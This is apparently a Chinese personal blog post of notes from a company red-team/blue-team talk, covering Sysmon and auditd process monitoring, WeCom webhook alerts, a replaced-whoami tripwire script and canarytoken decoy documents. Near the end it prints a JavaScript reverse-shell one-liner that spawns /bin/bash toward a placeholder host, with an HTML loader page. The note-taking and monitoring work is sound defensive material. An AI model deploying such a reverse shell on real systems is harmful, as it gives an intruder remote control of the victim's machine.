某次红蓝学到的一点东西

2021-09-14

字数统计: 1.8k字 | 阅读时长≈ 8分

这是公司的分享会大佬分享出来的，于是学习了一部分，记一下笔记

sysmon监控进程（windows下）

windows下的进程监控工具

官方的下载地址和文档在这：https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#configuration-files（中英文页面一样，都没翻译）

安装和使用方法

使用方法也比较简单（会写设置的xml文件的话），官方的使用如下：

Usage:
Install:                 Sysmon64.exe -i [<configfile>] # 安装
Update configuration:    Sysmon64.exe -c [<configfile>] # 更新配置文件，配置文件为固定格式的xml文件
Install event manifest:  Sysmon64.exe -m  # 安装事件清单（机翻），没用过
Print schema:            Sysmon64.exe -s  # 打印模式，（机翻），没用过
Uninstall:               Sysmon64.exe -u [force]  # 卸载

一般来说，我们的指令都用的是下面的几个

Sysmon -i  #基本安装
Sysmon -accepteula -i xxxx.xml #通过配置安装
Sysmon -c xxxx.xml #更新配置
Sysmon -u #卸载

阅读日志

打开cmd，执行eventvwr命令，在应用程序和服务日志（英文是Applications and Services Logs）->Microsoft->Windows->Sysmon->operational即可查看，日志里会有rulename，对于之前写的规则。

config.xml写法（重点）

eventfilter的标签如下：

ProcessCreate            进程创建
FileCreateTime           文件创建时间更改
NetworkConnect           检测到网络连接
ProcessTerminate         进程终止
DriverLoad               驱动程序已加载
ImageLoad                镜像加载
CreateRemoteThread       已检测到创建远程线程
RawAccessRead            检测到原始访问读取
ProcessAccess            已访问的进程
FileCreate               文件创建
RegistryEvent            添加或删除注册表对象
RegistryEvent            注册表值设置
RegistryEvent            注册表对象已重命名
FileCreateStreamHash     已创建文件流
PipeEvent                管道创建
PipeEvent                管道已连接
WmiEvent                 检测到WmiEventFilter活动 -- WmiEventFilter activity detected
WmiEvent                 检测到WmiEventConsumer活动 -- WmiEventConsumer activity detected
WmiEvent                 检测到WmiEventConsumerToFilter活动 -- WmiEventConsumerToFilter activity 
DnsQuery                 DNS查询

标签有这么几种状态：

is
is any
is not
contains
contains any
contains all
excludes
excludes any
excludes all
begin with
end with
not begin with
not end with
less than
more than
image

例子（image我还设没完全理解，但依葫芦画瓢写一写勉强够用了）：

<Sysmon schemaversion="4.21"><!--配置版本需要与sysmon版本匹配-->
<!-- Capture all hashes -->
<HashAlgorithms>*</HashAlgorithms> <!--哈希配置(默认使用sha1)，这个可以不管 -->
<EventFiltering> <!--事件筛选-->
<!-- Log all drivers except if the signature -->
<!-- contains Microsoft or Windows -->
<DriverLoad onmatch="exclude"> <!--默认记录所有日志 除非标记 ? -->
     <Signature condition="contains">microsoft</Signature>
     <Signature condition="contains">windows</Signature>
</DriverLoad>
<!-- Do not log process termination -->
<!--不记录进程终止-->
<ProcessTerminate onmatch="include" />
<!-- Log network connection if the destination port equal 443 -->
<!-- or 80, and process isn't InternetExplorer -->
<NetworkConnect onmatch="include">
     <DestinationPort>443</DestinationPort> <!-- 记录443 端口连接记录-->
     <DestinationPort>80</DestinationPort>
</NetworkConnect>
<NetworkConnect onmatch="exclude">
     <Image condition="end with">iexplore.exe</Image><!-- 这个没看懂-->
</NetworkConnect>
</EventFiltering>
</Sysmon>
 -- 配置条目直接位于Sysmon 标签下, 过滤器位于 EventFiltering 标签下

企微推送消息

这个简单

bot_url = "" # 创建企微机器人能看的有webhook地址
data = {
    "msgtype":"markdown",
    "markdown":{
        "content": "实时新增用户反馈<font color=\"warning\">132例</font>，请相关同事注意。\n"+
        "> 类型:<font color=\"comment\">用户反馈</font>\n"+
        "> 普通用户反馈:<font color=\"comment\">117例</font>\n"+
        "> VIP用户反馈:<font color=\"comment\">15例</font>"
    }
}
request.post(url=bot_url,data=data)

有我的个人信息，就不贴图了，实现起来很简单

audit监控进程（linux）

sudo apt-get install auditd

可以看这篇文章，有基本的参数设置，简单易懂：

https://idc.wanyunshuju.com/cym/1323.html

（我的ubuntu18上整不出来，麻了）

获取IP

def get_ip():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(('192.168.80.128',10001)) # 尝试用10001端口连接192.168.80.128服务器，服务器就随便填了，反正只要IP
        ip = s.getsockname()[0] # 获取IP地址
    except:
        ip = ''
        pass
    finally:
        s.close()
    return ip

python实现监控

这里是分享会上两位师傅的脚本，我觉得很有意思，就学习（嫖）了一下

linux下

linux下用inotify-tools进行监控

import socket
import inotify.adapters
#需要 pip3 install inotify，一定不要用conda安装

def get_ip():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        time.
        s.connect(('192.168.80.128', 10001))# IP随便写,端口写个能用的就行
        ip = s.getsockname()[0] # 获取本机IP
    except:
        ip = ''
        pass
    finally:
        s.close()
    return ip


def main():
    watchtarget = ['/usr/bin/whoami']  # 监控文件
    i = inotify.adapters.Inotify(paths=watchtarget)  # inotify监控文件
    local_ip = get_ip()
    for event in i.event_gen(yield_nones=False):
        (_, type_names, path, filename) = event
        print("PATH=[{}] FILENAME=[{}] EVENT_TYPES=[{}] local_ip=[{}]".format(path, filename, type_names,local_ip))
        if "IN_OPEN" in type_names:
            print("Be attacked!")# 这里可以换成企微推送就不用一直看着了


if __name__ == "__main__":
    main()

效果如图：

配合企微机器人和nohup命令使用更佳

识别：

这个好说，ps -aux，有python在跑脚本就小心了。

windows下

首先，将whoami.exe进行替换为who.exe

import os
import requests, time
import socket


def get_ip():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.settimeout(1)
        s.connect("192.168.80.136", 12000)
        ip = s.getsockname()[0]
    except Exception:
        ip = ""
        pass
    finally:
        s.close()
    return ip


def pushmessage(Cmd, cmdresult, ip, ppid):
    nowtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
    bot_url = "https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=xxxxxx"
    data = {
        "msgtype": "markdown",
        "markdown": {
            "content": "<font color='warning'>" + Cmd + "</font>被执行！！\n"
                       + "> 执行时间：<font color='comment'>" + nowtime + "</font>\n"
                       + "> 进程ID：<font color='comment'>" + ppid + "</font>\n"
                       + "> 执行结果：<font color='comment'>" + cmdresult.replace('\\', '\\\\') + "</font>\n"
                       + "> 主机IP：<font color='comment'>" + ip + "</font>"
        }
    }
    requests.post(url=bot_url, json=data)


def main():
    Cmd = "c:\\windows\\system32\\who.exe"
    p = os.popen(Cmd)
    result = p.read().strip("\n")
    print(result)
    ip = get_ip()
    ppid = os.getppid()
    pushmessage(Cmd,result, ip, ppid)


if __name__ == '__main__':
    main()

再将这个用pyinstaller打包成exepyinstaller --icon xxx.ico --onfile xxx.py -n whoami.exe（不想指定图标可以去掉–icon选项）。

这个我就不演示了，因为要输出执行结果，所以不能挂起，只能用企微推送

诱饵文档

用的是这个：https://github.com/thinkst/canarytokens

原理和这个一样https://x.threatbook.cn/v5/article?threatInfoID=9244，触发远程模板链接访问内嵌URL

具体不演示（没整）

处理：

不管啥doc丢虚拟机里断网跑

扔微步在线里，确认没有恶意外联再打开

js反弹shell

(function(){var net = require("child_process"),sh = cp.spawn("/bin/bash", []);var client = new net.socket();client.connect(2333,"x.x.x.x");function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();

再写个a.html

<html>
    <head><title>test</title></head>
    <body><script type="text/javascript" src="a.js"></script></body>
</html>

案例来说访问a.html应该有shell过来的，但没成功不知道为啥

本文作者： Sn1pEr
本文链接： https://sn1per-ssd.github.io/2021/09/14/某次红蓝学到的一点东西/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！